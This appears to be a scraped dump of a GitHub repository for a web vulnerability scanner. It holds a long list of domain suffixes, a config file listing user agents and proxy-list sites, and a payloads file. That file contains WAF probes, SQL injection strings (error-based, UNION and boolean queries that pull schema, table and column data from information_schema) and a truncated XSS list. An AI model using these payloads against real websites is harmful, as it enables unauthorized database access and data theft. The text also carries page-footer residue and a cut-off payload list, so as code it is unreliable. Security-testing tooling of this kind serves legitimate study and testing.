1201 | kinder
1202 | kitakyushu.jp
1203 | kitchen
1204 | kiwi
1205 | kiwi.nz
1206 | km
1207 | kn
1208 | kobe.jp
1209 | kochi.jp
1210 | koeln
1211 | komatsu
1212 | komforb.se
1213 | kommunalforbund.se
1214 | komvux.se
1215 | konyvelo.hu
1216 | kp
1217 | kpn
1218 | kr
1219 | kr.com
1220 | kr.tc
1221 | krd
1222 | kred
1223 | kumamoto.jp
1224 | kw
1225 | ky
1226 | kyonggi.kr
1227 | kyoto
1228 | kyoto.jp
1229 | kz
1230 | la
1231 | lacaixa
1232 | lakas.hu
1233 | lamborghini
1234 | lamer
1235 | lanarb.se
1236 | lanbib.se
1237 | lancaster
1238 | land
1239 | landrover
1240 | lanxess
1241 | lasalle
1242 | lat
1243 | latrobe
1244 | law
1245 | law.pro
1246 | law.za
1247 | lawyer
1248 | lb
1249 | lc
1250 | lds
1251 | lease
1252 | leclerc
1253 | legal
1254 | lel.br
1255 | lexus
1256 | lg.jp
1257 | lgbt
1258 | li
1259 | liaison
1260 | lidl
1261 | life
1262 | lifeinsurance
1263 | lifestyle
1264 | lighting
1265 | like
1266 | limited
1267 | limo
1268 | limo.cf
1269 | lincoln
1270 | linde
1271 | link
1272 | live
1273 | living
1274 | lixil
1275 | lk
1276 | lkd.co.im
1277 | llc
1278 | ln.cn
1279 | loan
1280 | loans
1281 | localdomain
1282 | lol
1283 | london
1284 | lotte
1285 | lotto
1286 | love
1287 | lr
1288 | ls
1289 | lt
1290 | ltd
1291 | ltd.gg
1292 | ltd.je
1293 | ltd.uk
1294 | ltda
1295 | lu
1296 | lupin
1297 | luxe
1298 | luxury
1299 | lv
1300 | ly
1301 | ma
1302 | madrid
1303 | maif
1304 | mail.pl
1305 | maison
1306 | makeup
1307 | man
1308 | management
1309 | mango
1310 | maori.nz
1311 | market
1312 | marketing
1313 | markets
1314 | marriott
1315 | mat.br
1316 | matsuyama.jp
1317 | mb.ca
1318 | mba
1319 | mc
1320 | md
1321 | me
1322 | me.uk
1323 | med
1324 | med.br
1325 | med.ec
1326 | med.ee
1327 | med.om
1328 | med.pro
1329 | med.sa
1330 | med.sd
1331 | medecin.fr
1332 | media
1333 | media.hu
1334 | media.pl
1335 | meet
1336 | melbourne
1337 | meme
1338 | memorial
1339 | men
1340 | menu
1341 | meo
1342 | mf
1343 | mg
1344 | mh
1345 | miami
1346 | miasta.pl
1347 | microsoft
1348 | mie.jp
1349 | mil
1350 | mil.ac
1351 | mil.ar
1352 | mil.br
1353 | mil.co
1354 | mil.do
1355 | mil.ec
1356 | mil.er
1357 | mil.ge
1358 | mil.gt
1359 | mil.gu
1360 | mil.id
1361 | mil.in
1362 | mil.jo
1363 | mil.kh
1364 | mil.lb
1365 | mil.lv
1366 | mil.nz
1367 | mil.pe
1368 | mil.ph
1369 | mil.pl
1370 | mil.sh
1371 | mil.st
1372 | mil.tr
1373 | mil.uy
1374 | mil.ve
1375 | mil.ye
1376 | mil.za
1377 | mini
1378 | miyagi.jp
1379 | miyazaki.jp
1380 | mjj.la
1381 | mk
1382 | ml
1383 | mm
1384 | mma
1385 | mn
1386 | mo
1387 | mo.cn
1388 | mob.nr
1389 | mobi
1390 | mobi.tt
1391 | mobil.nr
1392 | mobile.nr
1393 | mobily
1394 | mod.om
1395 | mod.uk
1396 | moda
1397 | moe
1398 | moi
1399 | mom
1400 | monash
1401 | money
1402 | montblanc
1403 | mormon
1404 | mortgage
1405 | moscow
1406 | motorcycles
1407 | mov
1408 | movie
1409 | movistar
1410 | mp
1411 | mq
1412 | mr
1413 | ms
1414 | msk.ru
1415 | mt
1416 | mtn
1417 | mtpc
1418 | mtr
1419 | mu
1420 | muni.il
1421 | mus.br
1422 | museum
1423 | museum.mn
1424 | museum.om
1425 | museum.tt
1426 | mutuelle
1427 | mv
1428 | mw
1429 | mx
1430 | mx.tc
1431 | my
1432 | mz
1433 | na
1434 | nadex
1435 | nagano.jp
1436 | nagasaki.jp
1437 | nagoya
1438 | nagoya.jp
1439 | name
1440 | name.et
1441 | name.tt
1442 | name.vg
1443 | name.vn
1444 | nara.jp
1445 | nat.tn
1446 | naturbruksgymn.se
1447 | navy
1448 | nb.ca
1449 | nc
1450 | ne
1451 | ne.gg
1452 | ne.jp
1453 | ne.kr
1454 | nec
1455 | net
1456 | net.ac
1457 | net.ae
1458 | net.ag
1459 | net.ar
1460 | net.au
1461 | net.az
1462 | net.bb
1463 | net.bh
1464 | net.bm
1465 | net.br
1466 | net.bs
1467 | net.bz
1468 | net.ck
1469 | net.cm
1470 | net.cn
1471 | net.co
1472 | net.cu
1473 | net.cy
1474 | net.do
1475 | net.dz
1476 | net.ec
1477 | net.eg
1478 | net.er
1479 | net.et
1480 | net.fk
1481 | net.ge
1482 | net.gg
1483 | net.gr
1484 | net.gt
1485 | net.gu
1486 | net.hk
1487 | net.hn
1488 | net.ht
1489 | net.id
1490 | net.il
1491 | net.im
1492 | net.in
1493 | net.ir
1494 | net.je
1495 | net.jo
1496 | net.jp
1497 | net.kh
1498 | net.ki
1499 | net.kw
1500 | net.la
1501 | net.lb
1502 | net.lc
1503 | net.lv
1504 | net.ly
1505 | net.ma
1506 | net.mm
1507 | net.mo
1508 | net.ms
1509 | net.mt
1510 | net.mu
1511 | net.mx
1512 | net.my
1513 | net.na
1514 | net.nc
1515 | net.nf
1516 | net.ng
1517 | net.ni
1518 | net.np
1519 | net.nz
1520 | net.om
1521 | net.pa
1522 | net.pe
1523 | net.pg
1524 | net.ph
1525 | net.pk
1526 | net.pl
1527 | net.pt
1528 | net.py
1529 | net.qa
1530 | net.ru
1531 | net.sa
1532 | net.sb
1533 | net.sc
1534 | net.sd
1535 | net.sg
1536 | net.sh
1537 | net.so
1538 | net.st
1539 | net.sy
1540 | net.tc
1541 | net.tf
1542 | net.th
1543 | net.tn
1544 | net.tr
1545 | net.tt
1546 | net.tw
1547 | net.ua
1548 | net.uk
1549 | net.uy
1550 | net.vc
1551 | net.ve
1552 | net.vi
1553 | net.vn
1554 | net.vu
1555 | net.ws
1556 | net.ye
1557 | net.za
1558 | netbank
1559 | network
1560 | neustar
1561 | new
1562 | news
1563 | news.hu
1564 | nexus
1565 | nf
1566 | nf.ca
1567 | ng
1568 | ngo
1569 | ngo.ph
1570 | ngo.za
1571 | nhk
1572 | nhs.uk
1573 | ni
1574 | nic.im
1575 | nic.in
1576 | nic.tt
1577 | nic.uk
1578 | nico
1579 | nieruchomosci.pl
1580 | niigata.jp
1581 | ninja
1582 | nissan
1583 | nl
1584 | nl.ca
1585 | nm.cn
1586 | no
1587 | no.com
1588 | no.tc
1589 | nokia
1590 | nom.ag
1591 | nom.br
1592 | nom.co
1593 | nom.es
1594 | nom.fk
1595 | nom.fr
1596 | nom.ni
1597 | nom.pe
1598 | nom.pl
1599 | nom.re
1600 | nom.ro
1601 | nom.ve
1602 | nom.za
1603 | nome.pt
1604 | norton
1605 | not.br
1606 | notaires.fr
1607 | nowruz
1608 | np
1609 | nr
1610 | nra
1611 | nrw
1612 | ns.ca
1613 | nt.ca
1614 | nt.ro
1615 | ntr.br
1616 | ntt
1617 | nu
1618 | nu.ca
1619 | nx.cn
1620 | nyc
1621 | nz
1622 | obi
1623 | odo.br
1624 | office
1625 | oita.jp
1626 | ok.pe
1627 | okayama.jp
1628 | okinawa
1629 | okinawa.jp
1630 | om
1631 | omega
1632 | on.ca
1633 | one
1634 | ong
1635 | onl
1636 | online
1637 | oo.lv
1638 | ooo
1639 | or.at
1640 | or.cr
1641 | or.id
1642 | or.jp
1643 | or.kr
1644 | or.th
1645 | or.ug
1646 | oracle
1647 | orange
1648 | org
1649 | org.ac
1650 | org.ae
1651 | org.ag
1652 | org.ai
1653 | org.ar
1654 | org.au
1655 | org.az
1656 | org.bb
1657 | org.bh
1658 | org.bm
1659 | org.br
1660 | org.bs
1661 | org.ck
1662 | org.cm
1663 | org.cn
1664 | org.co
1665 | org.cu
1666 | org.cy
1667 | org.do
1668 | org.dz
1669 | org.ec
1670 | org.ee
1671 | org.eg
1672 | org.er
1673 | org.es
1674 | org.et
1675 | org.fj
1676 | org.fk
1677 | org.ge
1678 | org.gg
1679 | org.gr
1680 | org.gt
1681 | org.gu
1682 | org.hk
1683 | org.hn
1684 | org.ht
1685 | org.hu
1686 | org.il
1687 | org.im
1688 | org.in
1689 | org.ir
1690 | org.je
1691 | org.jo
1692 | org.jp
1693 | org.kh
1694 | org.ki
1695 | org.kw
1696 | org.la
1697 | org.lb
1698 | org.lc
1699 | org.lv
1700 | org.ly
1701 | org.ma
1702 | org.mm
1703 | org.mn
1704 | org.mo
1705 | org.mt
1706 | org.mu
1707 | org.mx
1708 | org.my
1709 | org.na
1710 | org.nc
1711 | org.ng
1712 | org.ni
1713 | org.np
1714 | org.nz
1715 | org.om
1716 | org.pa
1717 | org.pe
1718 | org.ph
1719 | org.pk
1720 | org.pl
1721 | org.pt
1722 | org.py
1723 | org.qa
1724 | org.ro
1725 | org.ru
1726 | org.sa
1727 | org.sb
1728 | org.sc
1729 | org.sd
1730 | org.se
1731 | org.sg
1732 | org.sh
1733 | org.so
1734 | org.st
1735 | org.sv
1736 | org.sy
1737 | org.tn
1738 | org.tr
1739 | org.tt
1740 | org.tw
1741 | org.ua
1742 | org.uk
1743 | org.uy
1744 | org.vc
1745 | org.ve
1746 | org.vi
1747 | org.vn
1748 | org.vu
1749 | org.ws
1750 | org.ye
1751 | org.yu
1752 | org.za
1753 | org.zw
1754 | organic
1755 | origins
1756 | osaka
1757 | osaka.jp
1758 | otc.au
1759 | otsuka
1760 | ovh
1761 | oz.au
1762 | pa
1763 | page
1764 | pamperedchef
1765 | panerai
1766 | paris
1767 | pars
1768 | parti.se
1769 | partners
1770 | parts
1771 | party
1772 | pay
1773 | pc.pl
1774 | pe
1775 | pe.ca
1776 | pe.kr
1777 | per.kh
1778 | per.sg
1779 | pet
1780 | pf
1781 | pg
1782 | ph
1783 | ph.tc
1784 | pharmacien.fr
1785 | pharmacy
1786 | philips
1787 | photo
1788 | photography
1789 | photos
1790 | physio
1791 | piaget
1792 | pics
1793 | pictet
1794 | pictures
1795 | pid
1796 | pin
1797 | ping
1798 | pink
1799 | pizza
1800 | pk
1801 | pl
1802 | pl.tc
1803 | pl.tf
1804 | place
1805 | play
1806 | playstation
1807 | plc.co.im
1808 | plc.im
1809 | plc.uk
1810 | plo.ps
1811 | plumbing
1812 | plus
1813 | pm
1814 | pn
1815 | pohl
1816 | poker
1817 | pol.dz
1818 | police.uk
1819 | porn
1820 | port.fr
1821 | post
1822 | powiat.pl
1823 | pp.ru
1824 | pp.se
1825 | ppg.br
1826 | pr
1827 | praxi
1828 | prd.fr
1829 | press
1830 | press.ma
1831 | press.se
1832 | presse.fr
1833 | pri.ee
1834 | principe.st
1835 | priv.at
1836 | priv.hu
1837 | priv.pl
1838 | pro
1839 | pro.ae
1840 | pro.br
1841 | pro.om
1842 | pro.tc
1843 | pro.tt
1844 | pro.vg
1845 | pro.vn
1846 | prod
1847 | productions
1848 | prof
1849 | promo
1850 | properties
1851 | property
1852 | protection
1853 | ps
1854 | psc.br
1855 | psi.br
1856 | pt
1857 | pub
1858 | pub.sa
1859 | publ.pt
1860 | pvt.ge
1861 | pw
1862 | py
1863 | qa
1864 | qc.ca
1865 | qc.com
1866 | qh.cn
1867 | qpon
1868 | qq.name
1869 | qsl.br
1870 | quebec
1871 | racing
1872 | re
1873 | re.kr
1874 | read
1875 | realestate.pl
1876 | realtor
1877 | realty
1878 | rec.br
1879 | rec.co
1880 | rec.ro
1881 | rec.ve
1882 | recht.pro
1883 | recipes
1884 | red
1885 | red.sv
1886 | redstone
1887 | redumbrella
1888 | rehab
1889 | reise
1890 | reisen
1891 | reit
1892 | reklam.hu
1893 | rel.pl
1894 | ren
1895 | rent
1896 | rentals
1897 | repair
1898 | report
1899 | republican
1900 | res.in
1901 | rest
1902 | restaurant
1903 | review
1904 | reviews
1905 | rexroth
1906 | rich
1907 | ricoh
1908 | rio
1909 | rip
1910 | rnrt.tn
1911 | rns.tn
1912 | rnu.tn
1913 | ro
1914 | rocher
1915 | rocks
1916 | rodeo
1917 | room
1918 | rs
1919 | rsvp
1920 | ru
1921 | ru.com
1922 | ru.tc
1923 | ru.tf
1924 | ruhr
1925 | run
1926 | rw
1927 | rwe
1928 | ryukyu
1929 | s.pe
1930 | sa
1931 | sa.com
1932 | sa.cr
1933 | saarland
1934 | safe
1935 | safety
1936 | saga.jp
1937 | saitama.jp
1938 | sakura
1939 | sale
1940 | salon
1941 | samsung
1942 | sandvik
1943 | sandvikcoromant
1944 | sanofi
1945 | saotome.st
1946 | sap
1947 | sapo
1948 | sapporo.jp
1949 | sark.gg
1950 | sarl
1951 | sas
1952 | saxo
1953 | sb
1954 | sbs
1955 | sc
1956 | sc.cn
1957 | sca
1958 | scb
1959 | sch.ae
1960 | sch.gg
1961 | sch.ir
1962 | sch.je
1963 | sch.ng
1964 | sch.sa
1965 | sch.sd
1966 | sch.uk
1967 | schaeffler
1968 | schmidt
1969 | scholarships
1970 | school
1971 | school.fj
1972 | school.nz
1973 | school.za
1974 | schule
1975 | schwarz
1976 | sci.eg
1977 | science
1978 | scor
1979 | scot
1980 | sd
1981 | sd.cn
1982 | se
1983 | se.com
1984 | se.net
1985 | se.tt
1986 | seat
1987 | sec.kz
1988 | sec.ps
1989 | security
1990 | seek
1991 | select
1992 | sendai.jp
1993 | sener
1994 | seoul.kr
1995 | services
1996 | seven
1997 | sew
1998 | sex
1999 | sex.hu
2000 | sex.pl
2001 | sexy
2002 | sfr
2003 | sg
2004 | sg.tf
2005 | sh
2006 | sh.cn
2007 | sharp
2008 | shell
2009 | shia
2010 | shiga.jp
2011 | shiksha
2012 | shimane.jp
2013 | shizuoka.jp
2014 | shoes
2015 | shop
2016 | shop.hu
2017 | shop.ms
2018 | shop.pl
2019 | shop.tc
2020 | shop.tm
2021 | show
2022 | shriram
2023 | si
2024 | singles
2025 | site
2026 | sj
2027 | sk
2028 | sk.ca
2029 | ski
2030 | skin
2031 | sklep.pl
2032 | sky
2033 | skype
2034 | sl
2035 | sld.do
2036 | sld.pa
2037 | slg.br
2038 | sm
2039 | sm.tv
2040 | smile
2041 | sn
2042 | sn.cn
2043 | sncf
2044 | so
2045 | soccer
2046 | social
2047 | softbank
2048 | software
2049 | sohu
2050 | solar
2051 | solutions
2052 | sony
2053 | sos.pl
2054 | soy
2055 | space
2056 | spb.ru
2057 | spiegel
2058 | sport.hu
2059 | spreadbetting
2060 | sr
2061 | srl
2062 | srv.br
2063 | ss
2064 | sshn.se
2065 | st
2066 | stada
2067 | star
2068 | starhub
2069 | statefarm
2070 | statoil
2071 | stb.pro
2072 | stc
2073 | stcgroup
2074 | stockholm
2075 | storage
2076 | store
2077 | store.co
2078 | store.ro
2079 | store.st
2080 | store.ve
2081 | studio
2082 | study
2083 | style
2084 | su
2085 | sucks
2086 | suli.hu
2087 | supplies
2088 | supply
2089 | support
2090 | surf
2091 | surgery
2092 | suzuki
2093 | sv
2094 | swatch
2095 | swiss
2096 | sx
2097 | sx.cn
2098 | sy
2099 | sydney
2100 | symantec
2101 | systems
2102 | sz
2103 | szex.hu
2104 | szkola.pl
2105 | tab
2106 | taipei
2107 | takamatsu.jp
2108 | taobao
2109 | targi.pl
2110 | tatamotors
2111 | tatar
2112 | tattoo
2113 | tax
2114 | taxi
2115 | tc
2116 | tci
2117 | td
2118 | team
2119 | tec.ve
2120 | tech
2121 | technology
2122 | tel
2123 | tel.no
2124 | tel.nr
2125 | telecom.na
2126 | telefonica
2127 | telememo.au
2128 | temasek
2129 | tennis
2130 | tf
2131 | tg
2132 | th
2133 | th.tc
2134 | thd
2135 | theater
2136 | theatre
2137 | then.fail
2138 | tickets
2139 | tienda
2140 | tiffany
2141 | tips
2142 | tires
2143 | tirol
2144 | tj
2145 | tj.cn
2146 | tk
2147 | tl
2148 | tlf.nr
2149 | tm
2150 | tm.fr
2151 | tm.hu
2152 | tm.mt
2153 | tm.pl
2154 | tm.ro
2155 | tm.se
2156 | tm.za
2157 | tmall
2158 | tmp.br
2159 | tn
2160 | to
2161 | tochigi.jp
2162 | today
2163 | tokushima.jp
2164 | tokyo
2165 | tokyo.jp
2166 | tools
2167 | top
2168 | toray
2169 | toshiba
2170 | tottori.jp
2171 | tourism.pl
2172 | tourism.tn
2173 | tours
2174 | town
2175 | toyama.jp
2176 | toyota
2177 | toys
2178 | tozsde.hu
2179 | tp
2180 | tr
2181 | trade
2182 | trading
2183 | training
2184 | travel
2185 | travel.pl
2186 | travel.tt
2187 | travelers
2188 | travelersinsurance
2189 | trd.br
2190 | trust
2191 | trv
2192 | tt
2193 | tube
2194 | tui
2195 | tur.br
2196 | turystyka.pl
2197 | tushu
2198 | tv
2199 | tv.br
2200 | tw
2201 | tw.cn
2202 | twbbs.org
2203 | twgg.org
2204 | twgogo.com
2205 | tz
2206 | ua
2207 | ua.tc
2208 | ubs
2209 | ug
2210 | uk
2211 | uk.com
2212 | uk.net
2213 | uk.pn
2214 | uk.tc
2215 | uk.to
2216 | uk.tt
2217 | um
2218 | unam.na
2219 | uni.cc
2220 | uni.me
2221 | university
2222 | uno
2223 | uol
2224 | us
2225 | us.com
2226 | us.ms
2227 | us.org
2228 | us.pn
2229 | us.tc
2230 | us.tf
2231 | us.to
2232 | us.tt
2233 | usa.cc
2234 | utazas.hu
2235 | utsunomiya.jp
2236 | uu.mt
2237 | uy
2238 | uy.com
2239 | uz
2240 | va
2241 | vacations
2242 | vana
2243 | vc
2244 | ve
2245 | vegas
2246 | ventures
2247 | verisign
2248 | versicherung
2249 | vet
2250 | vet.br
2251 | veterinaire.fr
2252 | vg
2253 | vi
2254 | viajes
2255 | video
2256 | video.hu
2257 | villas
2258 | vin
2259 | vip
2260 | virgin
2261 | vision
2262 | vista
2263 | vistaprint
2264 | viva
2265 | vlaanderen
2266 | vn
2267 | vodka
2268 | volkswagen
2269 | vote
2270 | voting
2271 | voto
2272 | voyage
2273 | vu
2274 | vv.cc
2275 | wakayama.jp
2276 | wales
2277 | walter
2278 | wang
2279 | wanggou
2280 | watch
2281 | watches
2282 | weather
2283 | web
2284 | web.co
2285 | web.do
2286 | web.pk
2287 | web.ve
2288 | web.za
2289 | webcam
2290 | weber
2291 | website
2292 | wed
2293 | wedding
2294 | weir
2295 | wf
2296 | whoswho
2297 | wien
2298 | wiki
2299 | williamhill
2300 | win
2301 | windows
2302 | wine
2303 | wme
2304 | wo.tc
2305 | work
2306 | works
2307 | world
2308 | ws
2309 | wtc
2310 | wtf
2311 | www.ro
2312 | xbox
2313 | xerox
2314 | xin
2315 | xj.cn
2316 | xn--1qqw23a
2317 | xn--3bst00m
2318 | xn--3ds443g
2319 | xn--3e0b707e
2320 | xn--45q11c
2321 | xn--55qw42g
2322 | xn--55qx5d
2323 | xn--55qx5d.hk
2324 | xn--55qx5d.xn--j6w193g
2325 | xn--6frz82g
2326 | xn--6qq986b3xl
2327 | xn--ciqpn.xn--j6w193g
2328 | xn--czr694b
2329 | xn--fiq228c5hs
2330 | xn--fiqs8s
2331 | xn--fiqz9s
2332 | xn--flw351e
2333 | xn--fzc2c9e2c
2334 | xn--gmqw5a.xn--j6w193g
2335 | xn--hxt814e
2336 | xn--i1b6b1a6a2e
2337 | xn--io0a7i
2338 | xn--io0a7i.xn--j6w193g
2339 | xn--j6w193g
2340 | xn--kput3i
2341 | xn--mxtq1m.xn--j6w193g
2342 | xn--nqv7f
2343 | xn--o3cw4h
2344 | xn--od0alg
2345 | xn--od0alg.xn--j6w193g
2346 | xn--q9jyb4c
2347 | xn--rhqv96g
2348 | xn--ses554g
2349 | xn--tn0ag.xn--j6w193g
2350 | xn--uc0atv.xn--j6w193g
2351 | xn--vhquv
2352 | xn--wcvs22d.xn--j6w193g
2353 | xn--xhq521b
2354 | xo.vc
2355 | xorg.pl
2356 | xperia
2357 | xxx
2358 | xyz
2359 | xz.cn
2360 | yachts
2361 | yamagata.jp
2362 | yamaguchi.jp
2363 | yamanashi.jp
2364 | yamaxun
2365 | yandex
2366 | ye
2367 | yi.org
2368 | yk.ca
2369 | yn.cn
2370 | yodobashi
2371 | yoga
2372 | yokohama
2373 | yokohama.jp
2374 | youtube
2375 | yt
2376 | yu
2377 | za
2378 | za.com
2379 | za.net
2380 | za.org
2381 | zara
2382 | zero
2383 | zip
2384 | zj.cn
2385 | zlg.br
2386 | zm
2387 | zone
2388 | zuerich
2389 | zw
2390 | © 2019 GitHub, Inc.
2391 | Terms
2392 | Privacy
2393 | Security
2394 | Status
2395 | Help
2396 | Contact GitHub
2397 | Pricing
2398 | API
2399 | Training
2400 | Blog
2401 | About
2402 |
--------------------------------------------------------------------------------
/data/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/YagamiiLight/Cerberus/7933d801b9a490e84bf38f5d8369d8395e350e39/data/__init__.py
--------------------------------------------------------------------------------
/data/config.py:
--------------------------------------------------------------------------------
1 | User_agents = \
2 | [
3 | "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
4 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
5 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
6 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
7 | ]
8 |
9 | Referer = ["https://www,baidu.com","https://www.google.com"]
10 |
11 | origin_proxies = {
12 | 'data5u' : "http://www.data5u.com",
13 | 'xicidaili' : "https://www.xicidaili.com",
14 | # 'goubanjia' : "http://www.goubanjia.com",
15 | 'ip3366' : "http://www.ip3366.net",
16 | 'iphai' : "http://www.iphai.com",
17 | 'cn-proxy' : "https://cn-proxy.com",
18 | 'ip_jiangxianli' : "http://ip.jiangxianli.com",
19 | 'xiladaili' : "http://www.xiladaili.com",
20 | 'ip_ihuan' : "https://ip.ihuan.me"
21 | }
22 |
23 |
24 |
--------------------------------------------------------------------------------
/data/payloads.py:
--------------------------------------------------------------------------------
1 | waf_checker = [ " '",
2 | " AND 1",
3 | " /**/AND/**/1",
4 | " AND 1=1",
5 | " AND 1 LIKE 1",
6 | " ' AND '1'='1",
7 | "
",
8 | "![]()
",
9 | ""
10 | ]
11 |
12 | Sql_injection = {
13 |
14 | "error_based" : ["'", "')", "';", '"', '")', '";', '`', '`)',
15 | '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C"],
16 |
17 | "union_query" : [" UNION ALL SELECT 1,2,3,4",
18 | " UNION ALL SELECT 1,2,3,4,5-- ",
19 | " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
20 | " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
21 | " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
22 | " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
23 | ],
24 |
25 | "boolean_based" : [ " AND 1=0",
26 | "' AND '1'='1",
27 | "' AND 1=1--",
28 | " ' AND 1=1#",
29 | " AND 1=1 AND '%'='",
30 | " AND 7300=7300 AND 'pKlZ'='pKlZ",
31 | " AS INJECTX WHERE 1=1 AND 1=1--",
32 | " ORDER BY 2--",
33 | " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
34 | " %' AND 8310=8310 AND '%'='",
35 | " and (select substring(@@version,1,1))='X'",
36 | " and (select substring(@@version,3,1))='S'",
37 | " AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-",
38 | " AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--",
39 | " AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--",
40 | " AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--",
41 | " AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--",
42 | " AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--"
43 | ]
44 | }
45 |
46 |
47 |
48 | XSS = ["z",
49 | "[confirm``]\"<\">z",
50 | "z",
51 | "",
52 | "